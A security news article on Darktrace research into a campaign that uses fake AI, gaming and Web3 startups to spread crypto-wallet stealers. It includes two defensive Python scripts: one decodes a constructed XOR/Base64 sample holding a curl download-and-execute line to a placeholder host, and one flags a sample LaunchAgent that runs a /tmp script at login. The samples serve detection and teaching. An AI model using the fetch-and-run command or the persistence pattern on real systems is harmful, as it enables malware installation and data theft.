Darktrace research reveals an ongoing social engineering campaign that targets cryptocurrency users through fake startups. The scammers use spoofed and hijacked social media accounts to impersonate AI, gaming and Web3 companies.
Project documentation is hosted on legitimate platforms such as Notion and GitHub. The campaign has been evolving since at least December 2024 and targets Web3 employees worldwide.
Fake companies use legitimate platforms to build a trustworthy presence
Threat actors create fake startups themed around AI, gaming and video conferencing software, plus Web3 and social media companies, with the facades built specifically to target cryptocurrency users. Initial contact with the victim typically comes from a compromised, verified X account.
The attackers host their documentation on legitimate platforms such as Notion, Medium and GitHub. Their professional-looking websites include employee profiles, product blogs, white papers and development roadmaps. The X accounts appear to be compromised rather than newly created, because their high follower counts lend the fake companies an air of legitimacy.
The scammers keep the social media accounts active, posting software development updates and product marketing content regularly for as long as the campaign runs. The Eternal Decay blockchain game, for example, fabricated photos of a conference presentation to appear credible.
The attackers edited photos from an exhibition in Italy so that they appeared to show a company presentation. Medium hosts blog posts about the fake software products and corporate news, and the Notion pages include a detailed product roadmap and a full employee list.
Figure: scammers' altered photos from an Italian exhibition (Source).
The GitHub repositories contain real-looking technical code lifted from stolen open source projects, with names changed so that each repository looks unique and original. Company registration details from Companies House are linked, but they belong to legitimate companies with similar names.
GitBook pages describe the company and list fake investor partnerships for credibility. Gameplay images stolen from an existing zombie game are presented as Eternal Decay content. Some of the fake companies even set up merchandise stores to complete the business facade.
Combined, these elements create a convincing startup and raise the infection success rate. Victims are contacted via X direct messages, Telegram or Discord by fake employees, who offer cryptocurrency payments in exchange for taking part in software testing.
Malware targets crypto wallet users on both Windows and macOS
The Windows version is distributed as an Electron app that requires a registration code, which the fake employee supplies over social media messaging. Once the code is entered, the binary is downloaded to the user's machine, and a Cloudflare-style verification screen is shown before the malware executes on the target system.
During its initial reconnaissance the malware collects a system profile: username, CPU details, RAM and graphics hardware, together with the MAC address and system UUID. A token-based authentication mechanism uses tokens derived from the application launcher URL.
Stolen code signing certificates lend the software legitimacy and help it evade security detection; certificates issued to Jiangyin Fengyuan Electronics Co. and PaperBucketMDB ApS were used. A Python runtime is retrieved and saved to a temporary directory for command execution.
The macOS version is delivered as a DMG file containing bash scripts and binaries. The scripts use obfuscation techniques such as Base64 encoding and XOR encryption. AppleScript mounts the payload and automatically runs executables from temporary directories.
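The Base64 and XOR layering described above is cheap to peel once the scheme is known. The following Python script is an added illustration, not code from the Darktrace research or from the campaign itself. It builds a constructed sample (a small shell script XORed with a single byte and then Base64-encoded; the single-byte key scheme, the key value 0x5A, the script contents and the example.invalid URL are all assumptions) and then recovers the key blind by brute-forcing every key byte and looking for a shell-script signature in the decoded output.

```python
import base64
import string
from typing import Optional, Tuple

# Constructed sample, not a real payload: a small shell script of the kind a
# DMG dropper might carry. The URL uses a reserved example domain.
PLAINTEXT = (
    b"#!/bin/bash\n"
    b"curl -s https://example.invalid/stage2 -o /tmp/.st && chmod +x /tmp/.st && /tmp/.st\n"
)
KEY = 0x5A  # assumed single-byte XOR key for the illustration


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def obfuscate(script: bytes, key: int) -> str:
    """Build the obfuscated blob the way the article describes: XOR first, then Base64."""
    return base64.b64encode(xor_bytes(script, key)).decode("ascii")


SAMPLE_BLOB = obfuscate(PLAINTEXT, KEY)
NOISE_BLOB = base64.b64encode(b"not a script at all").decode("ascii")  # negative case


def looks_like_shell(data: bytes) -> bool:
    """Heuristic: a shebang followed by printable text is what we expect to recover."""
    return data.startswith(b"#!") and all(chr(b) in string.printable for b in data)


def recover_key(blob: str) -> Optional[Tuple[int, bytes]]:
    """Base64-decode the blob and brute-force the single-byte XOR key.

    Returns (key, plaintext) for the first key that yields something that
    looks like a shell script, or None if no key does.
    """
    raw = base64.b64decode(blob)
    for key in range(256):
        candidate = xor_bytes(raw, key)
        if looks_like_shell(candidate):
            return key, candidate
    return None


def extract_urls(script: bytes) -> list:
    """Pull URLs out of a recovered script; these are the first indicators to pivot on."""
    return [
        tok.decode("ascii", "replace")
        for tok in script.split()
        if tok.startswith((b"http://", b"https://"))
    ]


if __name__ == "__main__":
    hit = recover_key(SAMPLE_BLOB)
    if hit:
        key, script = hit
        print(f"recovered key: 0x{key:02x}")
        print(script.decode())
        print("urls:", extract_urls(script))
```

A multi-byte XOR key or extra Base64 layers need a slightly different search (key length guessed from repeating patterns, decode repeated until the shebang appears), but the approach is the same: decode, score the candidate for the structure you expect, and pull out the stage-2 URLs and paths as indicators.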
The macOS malware performs anti-analysis checks for QEMU, VMware and Docker environments. The Atomic Stealer payload targets browser data, crypto wallets, cookies and document files; the stolen data is compressed and sent to the server in a POST request.
Additional bash scripts establish persistence through a LaunchAgent configured to run at login. The malware continuously logs the active application and window information, and user interaction timestamps are recorded and sent periodically to the collection server.
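A LaunchAgent that runs at login is one of the easiest persistence mechanisms to audit. The Python script below is an added example, not Darktrace's or the campaign's code: it parses LaunchAgent plists with the standard library, flags entries whose program or arguments reference temporary directories or use a shell interpreter as the entry point, and runs itself against two constructed plists (a benign app helper and an agent that launches a script from /tmp). The labels, file names and paths in the samples are invented for the illustration, and the heuristics are assumptions about what a dropper-installed agent tends to look like, not indicators published with the research.

```python
import os
import plistlib
import tempfile
from typing import Dict, List

# Locations a dropper-installed agent tends to reference; the article notes the
# macOS payload is staged in and run from temporary directories. (Assumed list.)
SUSPICIOUS_PATH_MARKERS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
# Entry points that indicate a script rather than a signed application bundle.
INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python", "python3", "curl"}


def analyse_launch_agent(plist_bytes: bytes) -> List[str]:
    """Return human-readable findings for one LaunchAgent plist (empty = nothing notable)."""
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception as exc:  # malformed or non-plist content is itself worth a look
        return [f"unparseable plist: {exc}"]

    args = list(plist.get("ProgramArguments") or [])
    if plist.get("Program"):
        args.insert(0, plist["Program"])
    if not args:
        return []

    findings = []
    entry = os.path.basename(str(args[0]))
    if entry in INTERPRETERS:
        findings.append(f"entry point is an interpreter: {entry}")
    for arg in args:
        if isinstance(arg, str) and any(m in arg for m in SUSPICIOUS_PATH_MARKERS):
            findings.append(f"references temporary or shared path: {arg}")

    # Autostart settings are only interesting once something else looks off.
    if findings:
        if plist.get("RunAtLoad"):
            findings.append("RunAtLoad is set (runs at login)")
        if plist.get("StartInterval") or plist.get("KeepAlive"):
            findings.append("agent is kept alive or re-run on an interval")
    return findings


def scan_directory(directory: str) -> Dict[str, List[str]]:
    """Analyse every .plist in a directory and keep only those with findings."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(directory, name), "rb") as fh:
            findings = analyse_launch_agent(fh.read())
        if findings:
            results[name] = findings
    return results


# Constructed samples (not real indicators): a normal app helper and a dropper-style agent.
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.example.helper",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/ExampleHelper", "--agent"],
    "RunAtLoad": True,
})
MALICIOUS_AGENT = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/bin/bash", "-c", "/tmp/.agent/run.sh"],
    "RunAtLoad": True,
    "StartInterval": 60,
})


def demo() -> Dict[str, List[str]]:
    """Write both samples to a scratch LaunchAgents directory and scan it."""
    with tempfile.TemporaryDirectory() as scratch:
        for name, data in (("com.example.helper.plist", BENIGN_AGENT),
                           ("com.example.updater.plist", MALICIOUS_AGENT)):
            with open(os.path.join(scratch, name), "wb") as fh:
                fh.write(data)
        return scan_directory(scratch)


if __name__ == "__main__":
    # On a real host, point scan_directory at os.path.expanduser("~/Library/LaunchAgents").
    for name, findings in demo().items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

On a real machine, run the scan over ~/Library/LaunchAgents as well as /Library/LaunchAgents and /Library/LaunchDaemons, and compare the results with the output of launchctl list so that an agent that was loaded but whose plist has since been deleted does not go unnoticed.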
Both versions specifically target cryptocurrency wallet data for theft. Several of the fake companies distribute the same malware under different branding and themes.
An extensive list of fake companies identified across multiple platforms
Darktrace identified several fake companies operating within this social engineering campaign. Pollen AI uses X accounts and websites to pose as a co-creation tool. Buzzu uses the same logo and code as Pollen but runs under different branding.
CloudSign claims to provide a document signing platform for business customers. SWOX presents itself as a next-generation social network for the Web3 space. Klastai is closely tied to the Pollen accounts and sites and carries the same branding.
WASPER uses the same logo and GitHub code as Pollen while operating from different regions. Lunelior operates through a variety of websites, each aimed at a different group of users. Beesync operated as a Buzzu alias before a rebrand in January 2025.
Slax hosts social media and AI-centric sites across multiple domains. Solune reaches users through social media activity and messaging apps. Eternal Decay poses as a blockchain gaming company, complete with fabricated conference presentations.
Dexis is the same brand as SWOX and shares its user base. Nexvoo manages multiple domains and social media platforms. Nexloop was rebranded to Nexoracore by renaming its GitHub repository.
Yondaai targets social media users and users across a variety of website domains. Each business presents a professional front by integrating with genuine platforms. The CrazyEvil traffer group has been running campaigns of this kind since 2021.
Recorded Future estimates CrazyEvil's revenue from malicious activity in the millions. The group is said to be behind attacks on crypto users, influencers and DeFi professionals. The campaign illustrates the broader effort these groups put into building a legitimate-looking business presence.